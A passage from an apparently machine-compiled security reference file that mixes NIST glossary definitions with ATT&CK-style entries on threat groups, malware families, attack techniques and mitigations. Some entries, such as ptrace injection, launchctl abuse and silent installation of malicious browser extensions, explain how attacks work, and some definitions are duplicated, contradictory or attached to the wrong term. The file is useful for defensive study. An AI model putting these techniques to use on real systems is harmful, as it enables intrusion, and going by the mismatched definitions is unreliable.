Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via VDSO hijacking may also evade detection from security products since the execution is masked under a legitimate process.

Term: Community cloud
Definition: The cloud infrastructure is provisioned for exclusive use by a specific community of consumers from organizations that have shared concerns (e.g., mission, security requirements, policy, and compliance considerations). It may be owned, managed, and operated by one or more of the organizations in the community, a third party, or some combination of them, and it may exist on or off premises.

Term: Blockchain network
Definition: the network in which a blockchain is being used.

Term: Switch
Definition: A device that channels incoming data from any of multiple input ports to the specific output port that will take the data toward its intended destination.

Term: Backscatter Channel
Definition: The type of back channel used by passive tags. Since passive tags do not have a local power source, they communicate by reflecting or backscattering electromagnetic signals received from a reader.

Term: <em>CIPHK(X)</em>
Definition: The output of the designated cipher function of the block cipher under the key K applied to the block X.

Term: CSM
Definition: See Capability, Configuration Settings Management.

Term: SAOP
Definition: The senior organizational official with overall organization-wide responsibility for information privacy issues.

Term: access control
Definition: Restricts access to resources to only privileged entities.

Term: high-impact system
Definition: An information system in which at least one security objective (confidentiality, integrity, or availability) is assigned a FIPS 199 potential impact value of high.

Name: APT16
Type: intrusion-set
Description: APT16 is a China-based threat group that has launched spearphishing campaigns targeting Japanese and Taiwanese organizations.

Term: Assurance- signature
Definition: A digital signature on a private-key-possession assurance message.

Term: malware
Definition: Software or firmware intended to perform an unauthorized process that will have adverse impact on the confidentiality, integrity, or availability of an information system. A virus, worm, Trojan horse, or other code-based entity that infects a host. Spyware and some forms of adware are also examples of malicious code.

Term: MTD
Definition: The amount of time mission/business process can be disrupted without causing significant harm to the organization’s mission.

Term: Federation Assurance Level (FAL)
Definition: A category that describes the federation protocol used to communicate an assertion containing authentication and attribute information (if applicable) to an RP, as defined in [NIST SP 800-63-3] in terms of three levels: FAL 1 (Some confidence), FAL 2 (High confidence), FAL 3 (Very high confidence).

Term: functional attack
Definition: An adversarial attack that is optimized for a set of data in a domain rather than per data point.

Term: NIST Special Publication
Definition: A type of publication issued by NIST. Specifically, the Special Publication 800-series reports on the Information Technology Laboratory's research, guidelines, and outreach efforts in computer security, and its collaborative activities with industry, government, and academic organizations. The 1800 series reports the results of National Cybersecurity Center of Excellence demonstration projects.

Term: Privacy engineering
Definition: A specialty discipline of systems engineering focused on achieving freedom from conditions that can create problems for individuals with unacceptable consequences that arise from the system as it processes PII.

Term: authenticate
Definition: The process of verifying a claimed identity of a user, device, or other entity in a computer system

Name: CreepyDrive
Type: malware
Description: CreepyDrive is a custom implant has been used by POLONIUM since at least early 2022 for C2 with and exfiltration to actor-controlled OneDrive accounts.

POLONIUM has used a similar implant called CreepyBox that relies on actor-controlled DropBox accounts.

Term: <em>F</em>
Definition: Standard Normal Cumulative Distribution Function (see Section 5.5.3).

Term: Compromised state
Definition: A lifecycle state for a key that is known or suspected of being known by an unauthorized entity.

Name: TajMahal
Type: malware
Description: TajMahal is a multifunctional spying framework that has been in use since at least 2014. TajMahal is comprised of two separate packages, named Tokyo and Yokohama, and can deploy up to 80 plugins.

Name: PolyglotDuke
Type: malware
Description: PolyglotDuke is a downloader that has been used by APT29 since at least 2013. PolyglotDuke has been used to drop MiniDuke.

Term: authenticity
Definition: The property of being genuine and being able to be verified and trusted; confidence in the validity of a transmission, a message, or message originator. See Authentication.

Term: Keyed-Hash Message Authentication Code
Definition: A message authentication code that uses a cryptographic key in conjunction with a hash function.

Term: Static key pair
Definition: A key pair, consisting of a private key (i.e., a static private key) and a public key (i.e., a static public key) that is intended for use for a relatively long period of time and is typically intended for use in multiple key establishment transactions. Contrast with an ephemeral key pair.

Name: Fooder
Type: malware
Description: Fooder is a custom 64-bit C/C++ loader used by MuddyWater that can decrypt and reflectively load embedded payloads such as a go-socks5 proxy utility, the open-source HackBrowserData infostealer, or the MuddyViper backdoor. Fooder has frequently masqueraded as an entertainment executable, such as the Snake game (e.g., `Snake_Game.exe`).

Term: Key derivation
Definition: 1. A process by which one or more keys are derived from a shared secret and other information during a key agreement transaction.

Term: Integer Factorization Cryptography
Definition: Integer Factorization Cryptography.

Term: message indicator (MI)
Definition: Sequence of bits transmitted over a communications system for synchronizing cryptographic equipment.

Term: Key wrapping
Definition: A method of encrypting and decrypting keys and (possibly) associated data using symmetric-key cryptography; both confidentiality and integrity protection are provided. See SP 800-38F. 6

Term: leap second
Definition: A second added to Coordinated Universal Time (UTC) to make it agree with astronomical time to within 0.9 second. UTC is an atomic time scale based on the performance of atomic clocks. Astronomical time is based on the rotational rate of the Earth. Since atomic clocks are more stable than the rate at which the Earth rotates, leap seconds are needed to keep the two time scales in agreement.

Term: C, CU, CV
Definition: Ciphertext (expressed as a byte string).

Term: Attribute Authority
Definition: An entity, recognized by the Federal PKI Policy Authority or comparable Agency body as having the authority to verify the association of attributes to an identity.

Term: Direct Digital Manufacturing
Definition: fabricating physical objects from a data file using computer-controlled processes with little to no human intervention. It includes Additive Manufacturing (AM), 3D printing, and rapid prototyping.

Term: SOAP Header
Definition: A collection of zero or more blocks of information prepended to a SOAP message, each of which might be targeted at any SOAP receiver within the message path.

Term: Capability, Event Preparation Management
Definition: An ISCM capability that ensures that procedures and resources are in place to respond to both routine and unexpected events that can compromise security. The unexpected events include both actual attacks and contingencies (natural disasters) like fires, floods, earthquakes, etc.

Term: Enrollment
Definition: The process through which a CSP/IdP provides a successfully identity-proofed applicant with a subscriber account and binds authenticators to grant persistent access.

Term: <em>MacTagLen</em>
Definition: The length of MacTag in bytes.

Term: superuser
Definition: A user that is authorized (and therefore, trusted) to perform security-relevant functions that ordinary users are not authorized to perform.

Term: subscriber
Definition: A party who has received a credential or token from a CSP.

Term: Personalization String
Definition: An optional string of bits that is combined with a secret entropy input and (possibly) a nonce to produce a seed.

Name: Latrodectus
Type: malware
Description: Latrodectus is a Windows malware downloader that has been used since at least 2023 to download and execute additional payloads and modules. Latrodectus has most often been distributed through email campaigns, primarily by TA577 and TA578, and has infrastructure overlaps with historic IcedID operations.

Term: Rationale
Definition: The explanation for why a Reference Document Element and a Focal Document Element are related within a set theory relationship mapping. This will be one of the following: syntactic, semantic, or functional.

Term: KAS1-basic
Definition: The basic form of Key-Agreement Scheme 1.

Term: KMP
Definition: A high-level statement of organizational key management policies that identifies a high-level structure, responsibilities, governing Standards and Recommendations, organizational dependencies and other relationships, and security policies.

Term: PII
Definition: Personally Identifiable Information; Any representation of information that permits the identity of an individual to whom the information applies to be reasonably inferred by either direct or indirect means.

Term: Virtualized Host
Definition: The physical host on which the virtualization software such as the Hypervisor is installed. Usually, the virtualized host will contain a special hardware platform that assists virtualization - specifically Instruction Set and Memory virtualization.

Term: security incident
Definition: An occurrence that actually or imminently jeopardizes, without lawful authority, the confidentiality, integrity, or availability of information or an information system or constitutes a violation or imminent threat of violation of law, security policies, security procedures, or acceptable use policies.

Term: message authentication code (MAC)
Definition: A cryptographic checksum on data that uses a symmetric key to detect both accidental and intentional modifications of the data. MACs provide authenticity and integrity protection but not non-repudiation protection.

Term: assertion injection attack
Definition: In the context of a federated protocol, consists of an attacker attempting to force an RP to accept or process an assertion or assertion reference in order to gain access to the RP or deny a legitimate subscriber access to the RP. The attacker does this by taking an assertion or assertion reference and injecting it into a vulnerable RP.

Name: Botnet
Type: attack-pattern
Description: Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks. Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers. With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale Phishing or Distributed Denial of Service (DDoS).

Name: FIN8
Type: intrusion-set
Description: FIN8 is a financially motivated threat group that has been active since at least January 2016, and known for targeting organizations in the hospitality, retail, entertainment, insurance, technology, chemical, and financial sectors. In June 2021, security researchers detected FIN8 switching from targeting point-of-sale (POS) devices to distributing a number of ransomware variants.

Term: Image
Definition: An exact bit-stream copy of all electronic data on a device, performed in a manner that ensures the information is not altered.

Term: trust
Definition: An ISCM capability that ensures that untrustworthy persons are prevented from being trusted with network access (to prevent insider attacks).

Term: Rate
Definition: The number of input bits processed or output bits generated per invocation of the underlying permutation.

Term: Uniform Resource Locator
Definition: A uniform resource locator, or URL, is a short string containing an address which refers to an object in the "web." URLs are a subset of URIs.

Term: Inherent Risk
Definition: The risk to an entity in the absence of any direct or focused actions by management to alter its severity.

Term: Sensitive
Definition: A descriptor of information whose loss, misuse, or unauthorized access or modification could adversely affect security.

Name: RainyDay
Type: malware
Description: RainyDay is a backdoor tool that has been used by Naikon since at least 2020.

Term: access control
Definition: Access privileges granted to a user, program, or process or the act of granting those privileges. Formerly known as "accreditation."

Term: Cryptographic algorithm
Definition: A well-defined computational procedure that takes variable inputs, including a cryptographic key (if applicable), and produces an output.

Term: Enrollment
Definition: The process through which an applicant applies to become a subscriber of a CSP and the CSP validates the applicant’s identity.

Term: Integrity verification
Definition: Obtaining assurance that information has not been altered in an unauthorized manner since it was created, transmitted or stored.

Name: Ptrace System Calls
Type: attack-pattern
Description: Adversaries may inject malicious code into processes via ptrace (process trace) system calls in order to evade process-based defenses as well as possibly elevate privileges. Ptrace system call injection is a method of executing arbitrary code in the address space of a separate live process. 

Ptrace system call injection involves attaching to and modifying a running process. The ptrace system call enables a debugging process to observe and control another process (and each individual thread), including changing memory and register values. Ptrace system call injection is commonly performed by writing arbitrary code into a running process (ex: <code>malloc</code>) then invoking that memory with <code>PTRACE_SETREGS</code> to set the register containing the next instruction to execute. Ptrace system call injection can also be done with <code>PTRACE_POKETEXT</code>/<code>PTRACE_POKEDATA</code>, which copy data to a specific address in the target processes’ memory (ex: the current address of the next instruction). 

Ptrace system call injection may not be possible targeting processes that are non-child processes and/or have higher-privileges. 

Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via ptrace system call injection may also evade detection from security products since the execution is masked under a legitimate process.

Term: security function
Definition: The capability provided by the system or a system element. The capability may be expressed generally as a concept or specified precisely in requirements.

Name: LITTLELAMB.WOOLTEA
Type: malware
Description: LITTLELAMB.WOOLTEA is a backdoor that was used by UNC5325 during Cutting Edge to deploy malware on targeted Ivanti Connect Secure VPNs and to establish persistence across system upgrades and patches.

Term: non-repudiation
Definition: Assurance that the sender of information is provided with proof of delivery and the recipient is provided with proof of the sender’s identity, so neither can later deny having processed the information.

Term: OLIR Catalog
Definition: The National OLIR Program’s online site for sharing OLIRs.

Term: Enhanced Data for GSM Evolution (EDGE)
Definition: An upgrade to GPRS to provide higher data rates by joining multiple time slots.

Term: Personal Firewall
Definition: A software-based firewall installed on a desktop or laptop computer to monitor and control its incoming and outgoing network traffic.

Term: risk executive (function)
Definition: An individual or group within an organization that helps to ensure that: (i) security risk-related considerations for individual information systems, to include the authorization decisions, are viewed from an organization-wide perspective with regard to the overall strategic goals and objectives of the organization in carrying out its missions and business functions; and (ii) managing information system-related security risks is consistent across the organization, reflects organizational risk tolerance, and is considered along with organizational risks affecting mission/business success.

Term: ICV
Definition: A fixed string that is prepended to the plaintext within the authenticated-encryption function of a key-wrap algorithm, in order to enable the verification of the integrity of the plaintext within the authenticated-decryption function.

Term: complex threat
Definition: Two or more separate attacks aimed at the same general or specific target(s) or objective(s).

Term: reinforcement learning
Definition: A type of machine learning in which a model learns to optimize its behavior according to a reward function by interacting with and receiving feedback from an environment.

Name: JHUHUGIT
Type: malware
Description: JHUHUGIT is malware used by APT28. It is based on Carberp source code and serves as reconnaissance malware.

Term: verification key
Definition: The cryptographic key used to verify a signature. In asymmetric cryptography, the verification key refers to the public key of the cryptographic key pair. In symmetric cryptography, the verification key is the symmetric key.

Term: RSA
Definition: Rivest, Shamir, Adelman; an algorithm approved in [FIPS 186] for digital signatures and in [SP 800-56B] for key establishment.

Name: SSL/TLS Inspection
Type: course-of-action
Description: SSL/TLS inspection involves decrypting encrypted network traffic to examine its content for signs of malicious activity. This capability is crucial for detecting threats that use encryption to evade detection, such as phishing, malware, or data exfiltration. After inspection, the traffic is re-encrypted and forwarded to its destination. This mitigation can be implemented through the following measures:

Deploy SSL/TLS Inspection Appliances:

- Implement SSL/TLS inspection solutions to decrypt and inspect encrypted traffic.
- Ensure appliances are placed at critical network choke points for maximum coverage.

Configure Decryption Policies:

- Define rules to decrypt traffic for specific applications, ports, or domains.
- Avoid decrypting sensitive or privacy-related traffic, such as financial or healthcare websites, to comply with regulations.

Integrate Threat Intelligence:

- Use threat intelligence feeds to correlate inspected traffic with known indicators of compromise (IOCs).

Integrate with Security Tools:

- Combine SSL/TLS inspection with SIEM and NDR tools to analyze decrypted traffic and generate alerts for suspicious activity.
- Example Tools: Splunk, Darktrace

Implement Certificate Management:

- Use trusted internal or third-party certificates for traffic re-encryption after inspection.
- Regularly update certificate authorities (CAs) to ensure secure re-encryption.

Monitor and Tune:

- Continuously monitor SSL/TLS inspection logs for anomalies and fine-tune policies to reduce false positives.

Term: host
Definition: Almost any kind of computer, including a centralized mainframe that is a host to its terminals, a server that is host to its clients, or a desktop personal computer (PC) that is host to its peripherals. In network architectures, a client station (user’s machine) is also considered a host because it is a source of information to the network, in contrast to a device, such as a router or switch, that directs traffic.

Name: HOPLIGHT
Type: malware
Description: HOPLIGHT is a backdoor Trojan that has reportedly been used by the North Korean government.

Term: Update Server
Definition: A server that provides patches and other software updates to IoT devices.

Term: DSIG
Definition: An asymmetric key operation where the private key is used to digitally sign data and the public key is used to verify the signature. Digital signatures provide authenticity protection, integrity protection, and non-repudiation, but not confidentiality protection.

Term: neighboring datasets
Definition: The definition of neighboring datasets is a parameter to the differential privacy framework. In many contexts, two databases are considered neighbors if they differ in the data of one individual.

Term: breadth
Definition: The steps of the ISCM process covered by an ISCM assessment: Strategy only (ISCM Step 1), Through Design (ISCM Steps 1, 2), Through implementation (ISCM Steps 1-3), or Full (ISCM Steps 1-6).

Term: certification
Definition: Comprehensive evaluation of an information system component that establishes the extent to which a particular design and implementation meets a set of specified security requirements.

Term: subscriber
Definition: An entity that has applied for and received a certificate from a Certificate Authority.

Term: NIST-allowed
Definition: Specified in a list of allowed security functions (e.g., in an annex to [FIPS 140]).

Term: likelihood
Definition: chance of something happening

Term: identity
Definition: The unique representation of a subject engaged in an online transaction. A digital identity is always unique in the context of a digital service, but does not necessarily need to uniquely identify the subject in all contexts. In other words, accessing a digital service may not mean that the subject’s real-life identity is known.

Term: systems engineering
Definition: A transdisciplinary and integrative approach to enable the successful realization, use, and retirement of engineered systems, using systems principles and concepts, and scientific, technological, and management methods.

Name: Embargo
Type: malware
Description: Embargo is a ransomware variant written in Rust that has been active since at least May 2024. Embargo ransomware operations are associated with “double extortion” ransomware activity, where data is exfiltrated from victim environments prior to encryption, with threats to publish files if a ransom is not paid. Embargo ransomware has been known to be delivered through a loader known as MDeployer which also leverages a malware component known as MS4Killer that facilitates termination of processes operating on the victim hosts. Embargo is also reportedly a Ransomware as a Service (RaaS).

Term: Infrastructure as a Service (IaaS)
Definition: The capability provided to the consumer is to provision processing, storage, networks, and other fundamental computing resources where the consumer is able to deploy and run arbitrary software, which can include operating systems and applications. The consumer does not manage or control the underlying cloud infrastructure but has control over operating systems, storage, and deployed applications; and possibly limited control of select networking components (e.g., host firewalls).

Term: RPKI
Definition: The Resource Public Key Infrastructure is a framework aimed to secure the Internet’s routing infrastructure, in particular the routing information such as the IP address prefix and Originator mapping embedded in the BGP protocol. It provides certificates that are used to verify if the originating AS is permitted to publish the embedded IP address prefix(es).

Term: <em>AES(k, input)</em>
Definition: A single AES encryption operation as specified in [FIPS 197] with k and input being the AES encryption key and one 128-bit block of plaintext/data, respectively.

Term: Internet Protocol
Definition: The Internet Protocol, as defined in IETF RFC 6864, which is the principal communications protocol in the IETF Internet protocol suite for specifying system address information when relaying datagrams across network boundaries.

Term: <em>nBits</em>
Definition: The bit length of the RSA modulus n.

Term: endpoint
Definition: Any device that is used to access a digital identity on a network, such as laptops, desktops, mobile phones, tablets, servers, Internet of Things devices, and virtual environments.

Term: Control Item
Definition: All or part of a SP 800-53 security control requirement, expressed as a statement for implementation and assessment. Both controls and control enhancements are treated as control items. Controls and control enhancements are further subdivided if multiple security requirements within the control or control enhancement in SP 800-53 are in listed format: a, b, c, etc.

Term: Primitive
Definition: A low-level cryptographic algorithm that is used as a basic building block for higher-level cryptographic operations or schemes.

Term: block cipher
Definition: A symmetric-key cryptographic algorithm that transforms one block of information at a time using a cryptographic key. For a block cipher algorithm, the length of the input block is the same as the length of the output block.

Term: module
Definition: The set of hardware, software, and/or firmware that implements security functions (including cryptographic algorithms and key generation) and is contained within a cryptographic module boundary. See FIPS 140.

Term: Category
Definition: The subdivision of a Function into groups of cybersecurity outcomes, closely tied to programmatic needs and particular activities. Examples of Categories include “Asset Management,” “Identity Management and Access Control,” and “Detection Processes.”

Term: ABAC
Definition: an access control paradigm whereby access rights are granted to users through the use of policies which combine attributes together. The policies can use any type of attributes (user attributes, resource attributes, environment attribute etc.

Term: availability breakdown
Definition: In the AML context, a disruption of the ability of other users or processes to obtain timely and reliable access to an AI system’s outputs or func­tionality.

Term: security specification
Definition: An assessment object that includes document-based artifacts (e.g., policies, procedures, plans, system security requirements, functional specifications, architectural designs) associated with a system.

Term: RPC
Definition: An entity that relies upon the subscriber’s credentials, typically to process a transaction or grant access to information or a system.

Term: Greatest common divisor
Definition: The largest positive integer that divides each of two or more positive integers without a remainder.

Term: root user
Definition: See privileged user.

Term: Multi-Factor
Definition: A characteristic of an authentication system or an authenticator that requires more than one distinct authentication factor for successful authentication. MFA can be performed using a single authenticator that provides more than one factor or by a combination of authenticators that provide different factors.
The three authentication factors are something you know, something you have, and something you are.

Name: Browser Extensions
Type: attack-pattern
Description: Adversaries may abuse internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality to and customize aspects of internet browsers. They can be installed directly via a local file or custom URL or through a browser's app store - an official online platform where users can browse, install, and manage extensions for a specific web browser. Extensions generally inherit the web browser's permissions previously granted. 
 
Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores, so it may not be difficult for malicious extensions to defeat automated scanners. Depending on the browser, adversaries may also manipulate an extension's update url to install updates from an adversary-controlled server or manipulate the mobile configuration file to silently install additional extensions. 

Adversaries may abuse how chromium-based browsers load extensions by modifying or replacing the Preferences and/or Secure Preferences files to silently install malicious extensions. When the browser is not running, adversaries can alter these files, ensuring the extension is loaded, granted desired permissions, and will persist in browser sessions. This method does not require user consent and extensions are silently loaded in the background from disk or from the browser's trusted store.
 
Previous to macOS 11, adversaries could silently install browser extensions via the command line using the <code>profiles</code> tool to install malicious <code>.mobileconfig</code> files. In macOS 11+, the use of the <code>profiles</code> tool can no longer install configuration profiles; however, <code>.mobileconfig</code> files can be planted and installed with user interaction. 
 
Once the extension is installed, it can browse to websites in the background, steal all information that a user enters into a browser (including credentials), and be used as an installer for a RAT for persistence. 

There have also been instances of botnets using a persistent backdoor through malicious Chrome extensions for Command and Control. Adversaries may also use browser extensions to modify browser permissions and components, privacy settings, and other security controls for Stealth.

Term: online service
Definition: A service that is accessed remotely via a network, typically the internet.

Name: SHIPSHAPE
Type: malware
Description: SHIPSHAPE is malware developed by APT30 that allows propagation and exfiltration of data over removable devices. APT30 may use this capability to exfiltrate data across air-gaps.

Name: SPAWNCHIMERA
Type: malware
Description: SPAWNCHIMERA is a backdoor that supports command and control and can inject malicious components into native processes. SPAWNCHIMERA It incorporates capabilities from multiple tools within the SPAWN malware family, including SPAWNANT, SPAWNMOLE, and SPAWNSNAIL. SPAWNCHIMERA was first reported in April 2024. SPAWNCHIMERA has been observed in activity attributed to People's Republic of China (PRC) state-sponsored threat actors, including UNC5221..

Name: Launchctl
Type: attack-pattern
Description: Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.

Adversaries use launchctl to execute commands and programs as Launch Agents or Launch Daemons. Common subcommands include: <code>launchctl load</code>,<code>launchctl unload</code>, and <code>launchctl start</code>. Adversaries can use scripts or manually run the commands <code>launchctl load -w "%s/Library/LaunchAgents/%s"</code> or <code>/bin/launchctl load</code> to execute Launch Agents or Launch Daemons.

Term: RA
Definition: The process of identifying risks to organizational operations (including mission, functions, image, reputation), organizational assets, individuals, other organizations, and the Nation, resulting from the operation of an information system.

Term: Information System Contingency Plan (ISCP)
Definition: Management policy and procedures designed to maintain or restore business operations, including computer operations, possibly at an alternate location, in the event of emergencies, system failures, or disasters.

Term: Interoperability
Definition: For the purposes of this standard, interoperability allows any government facility or information system, regardless of the PIV Issuer, to verify a cardholder’s identity using the credentials on the PIV Card.

Term: Triple Data Encryption Standard
Definition: Triple Data Encryption Standard specified in FIPS 46-3

Name: APT18
Type: intrusion-set
Description: APT18 is a threat group that has operated since at least 2009 and has targeted a range of industries, including technology, manufacturing, human rights groups, government, and medical.

Term: advanced cyber threat
Definition: See advanced persistent threat.

Term: digital signature
Definition: The result of a cryptographic transformation of data that, when properly implemented, provides a mechanism to verify origin authenticity and data integrity and to enforce signatory non-repudiation.

Term: Scheme
Definition: A (cryptographic) scheme consists of a set of unambiguously specified transformations that are capable of providing a (cryptographic) service when properly implemented and maintained. A scheme is a higher-level construct than a primitive and a lower-level construct than a protocol.

Term: Key agreement primitive
Definition: A primitive algorithm used in a key-agreement scheme specified in SP 800-56A or SP 800-56B.

Term: Device Cybersecurity Capability
Definition: A cybersecurity feature or function provided by an IoT device through its own technical means (i.e., device hardware and software).

Name: FIN7
Type: intrusion-set
Description: FIN7 is a financially-motivated threat group that has been active since 2013. FIN7 has targeted the retail, restaurant, hospitality, software, consulting, financial services, medical equipment, cloud services, media, food and beverage, transportation, pharmaceutical, and utilities industries in the United States. A portion of FIN7 was operated out of a front company called Combi Security and often used point-of-sale malware for targeting efforts. Since 2020, FIN7 shifted operations to big game hunting (BGH), including use of REvil ransomware and their own Ransomware-as-a-Service (RaaS), Darkside. FIN7 may be linked to the Carbanak Group, but multiple threat groups have been observed using Carbanak, leading these groups to be tracked separately.

Name: Disable or Remove Feature or Program
Type: course-of-action
Description: Disable or remove unnecessary and potentially vulnerable software, features, or services to reduce the attack surface and prevent abuse by adversaries. This involves identifying software or features that are no longer needed or that could be exploited and ensuring they are either removed or properly disabled. This mitigation can be implemented through the following measures: 

Remove Legacy Software:

- Use Case: Disable or remove older versions of software that no longer receive updates or security patches (e.g., legacy Java, Adobe Flash).
- Implementation: A company removes Flash Player from all employee systems after it has reached its end-of-life date.

Disable Unused Features:

- Use Case: Turn off unnecessary operating system features like SMBv1, Telnet, or RDP if they are not required.
- Implementation: Disable SMBv1 in a Windows environment to mitigate vulnerabilities like EternalBlue.

Control Applications Installed by Users:

- Use Case: Prevent users from installing unauthorized software via group policies or other management tools.
- Implementation: Block user installations of unauthorized file-sharing applications (e.g., BitTorrent clients) in an enterprise environment.

Remove Unnecessary Services:

- Use Case: Identify and disable unnecessary default services running on endpoints, servers, or network devices.
- Implementation: Disable unused administrative shares (e.g., C$, ADMIN$) on workstations.

Restrict Add-ons and Plugins:

- Use Case: Remove or disable browser plugins and add-ons that are not needed for business purposes.
- Implementation: Disable Java and ActiveX plugins in web browsers to prevent drive-by attacks.

Term: Chief Learning Officer
Definition: A senior-level executive who oversees all learning and employee development programs within an agency or organization.

Term: program manager
Definition: Note: Examples of systems or devices are workstations, guards, firewalls, routers, web server, database server, and other infrastructure components.

Term: differentially private synthetic dataset
Definition: A synthetic dataset that is produced by mechanisms that satisfy differential privacy.

Name: FLORAHOX Activity
Type: campaign
Description: FLORAHOX Activity is conducted using a hybrid operational relay box (ORB) network, which combines two types of infrastructure: compromised devices and leased Virtual Private Servers (VPS). The compromised devices include end-of-life routers and IoT devices, while VPS space is commercially leased and managed by ORB network administrators. This hybrid ORB network allows adversaries to proxy and obscure malicious traffic, making the source of the traffic more difficult to trace.

The FLORAHOX ORB network has been leveraged by multiple cyber threat actors, including China-nexus actors like ZIRCONIUM. These adversaries conduct espionage campaigns through FLORAHOX Activity, relying on the ORB network's ability to funnel traffic through Tor nodes, provisioned VPS servers, and compromised routers to obfuscate malicious traffic.

Term: negative risk
Definition: potential cause of an unwanted incident, which may result in harm to a system or organization

Term: cryptographic system review
Definition: Examination of a cryptographic system by the controlling authority ensuring its adequacy of design and content, continued need, and proper distribution.

Term: security incident
Definition: Anomalous or unexpected event, set of events, condition, or situation at any time during the life cycle of a project, product, service, or system.

Term: cryptographic key
Definition: See “Cryptographic Key”.

Term: personnel security
Definition: The discipline of assessing the conduct, integrity, judgment, loyalty, reliability, and stability of individuals for duties and responsibilities requiring trustworthiness.

Term: Information Management Policy
Definition: The high-level policy of an organization that specifies what information is to be collected or created, and how it is to be managed.

Term: Protect-P (Function)
Definition: Develop and implement appropriate data processing safeguards.

Term: SHA-256
Definition: A hash algorithm that can be used to generate digests of messages. The digests are used to detect whether messages have been changed since the digests were generated.

Name: Megazord
Type: malware
Description: Megazord is a Rust-based variant of Akira ransomware that has been in use since at least August 2023 to target Windows environments. Megazord has been attributed to the Akira group based on overlapping infrastructure though is possibly not exclusive to the group.

Term: PII Processing
Definition: An operation or set of operations performed upon PII that can include, but is not limited to, the collection, retention, logging, generation, transformation, use, disclosure, transfer, and disposal of PII.

Term: Contract
Definition: A mutually binding legal relationship obligating the seller to furnish the supplies or services (including construction) and the buyer to pay for them. It includes all types of commitments that obligate the Government to an expenditure of appropriated funds and that, except as otherwise authorized, are in writing. In addition to bilateral instruments, contracts include (but are not limited to) awards and notices of awards; job orders or task letters issued under basic ordering agreements; letter contracts; orders, such as purchase orders, under which the contract becomes effective by written acceptance or performance; and bilateral contract modifications. Contracts do not include grants and cooperative agreements covered by 31 U.S.C. 6301, et seq.

Term: Cybersecurity Incident
Definition: Anomalous or unexpected event, set of events, condition, or situation at any time during the life cycle of a project, product, service, or system.

Name: Wi-Fi Networks
Type: attack-pattern
Description: Adversaries may gain initial access to target systems by connecting to wireless networks. They may accomplish this by exploiting open Wi-Fi networks used by target devices or by accessing secured Wi-Fi networks — requiring Valid Accounts — belonging to a target organization. Establishing a connection to a Wi-Fi access point requires a certain level of proximity to both discover and maintain a stable network connection. 

Adversaries may establish a wireless connection through various methods, such as by physically positioning themselves near a Wi-Fi network to conduct close access operations. To bypass the need for physical proximity, adversaries may attempt to remotely compromise nearby third-party systems that have both wired and wireless network connections available (i.e., dual-homed systems). These third-party compromised devices can then serve as a bridge to connect to a target’s Wi-Fi network.

Once an initial wireless connection is achieved, adversaries may leverage this access for follow-on activities in the victim network or further targeting of specific devices on the network. Adversaries may perform Network Sniffing or Adversary-in-the-Middle activities for Credential Access or Discovery.

Name: Privileged Process Integrity
Type: course-of-action
Description: Privileged Process Integrity focuses on defending highly privileged processes (e.g., system services, antivirus, or authentication processes) from tampering, injection, or compromise by adversaries. These processes often interact with critical components, making them prime targets for techniques like code injection, privilege escalation, and process manipulation. This mitigation can be implemented through the following measures:

Protected Process Mechanisms:

- Enable RunAsPPL on Windows systems to protect LSASS and other critical processes.
- Use registry modifications to enforce protected process settings: `HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL`

Anti-Injection and Memory Protection:

- Enable Control Flow Guard (CFG), DEP, and ASLR to protect against process memory tampering.
- Deploy endpoint protection tools that actively block process injection attempts.

Code Signing Validation:

- Implement policies for Windows Defender Application Control (WDAC) or AppLocker to enforce execution of signed binaries.
- Ensure critical processes are signed with valid certificates.

Access Controls:

- Use DACLs and MIC to limit which users and processes can interact with privileged processes.
- Disable unnecessary debugging capabilities for high-privileged processes.

Kernel-Level Protections:

- Ensure Kernel Patch Protection (PatchGuard) is enabled on Windows systems.
- Leverage SELinux or AppArmor on Linux to enforce kernel-level security policies.

*Tools for Implementation*

Protected Process Light (PPL):

- RunAsPPL (Windows)
- Windows Defender Credential Guard

Code Integrity and Signing:

- Windows Defender Application Control (WDAC)
- AppLocker
- SELinux/AppArmor (Linux)

Memory Protection:

- Control Flow Guard (CFG), Data Execution Prevention (DEP), ASLR

Process Isolation/Sandboxing:

- Firejail (Linux Sandbox)
- Windows Sandbox
- QEMU/KVM-based isolation

Kernel Protection:

- PatchGuard (Windows Kernel Patch Protection)
- SELinux (Mandatory Access Control for Linux)
- AppArmor

Name: Stripped Payloads
Type: attack-pattern
Description: Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system’s `linker` when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.

Adversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats, such as run-only AppleScripts, a compiled and stripped version of AppleScript, to evade detection and analysis. The lack of human-readable information may directly hinder detection and analysis of payloads.

Term: security incident
Definition: An occurrence that actually or imminently jeopardizes, without lawful authority, the confidentiality, integrity, or availability of information or an information system; or constitutes a violation or imminent threat of violation of law, security policies, security procedures, or acceptable use policies.

Name: Cheerscrypt
Type: malware
Description: Cheerscrypt is a ransomware that was developed by Cinnamon Tempest and has been used in attacks against ESXi and Windows environments since at least 2022. Cheerscrypt was derived from the leaked Babuk source code and has infrastructure overlaps with deployments of Night Sky ransomware, which was also derived from Babuk.

Term: <em>eBits</em>
Definition: Length in bits of the RSA exponent e.

Term: hash value/result
Definition: The result of applying a cryptographic hash function to data (e.g., a message). Also known as a “message digest”.

Term: organization-defined parameter
Definition: The variable part of a control or control enhancement that is instantiated by an organization during the tailoring process by either assigning an organization-defined value or selecting a value from a predefined list provided as part of the control or control enhancement.

Term: CI
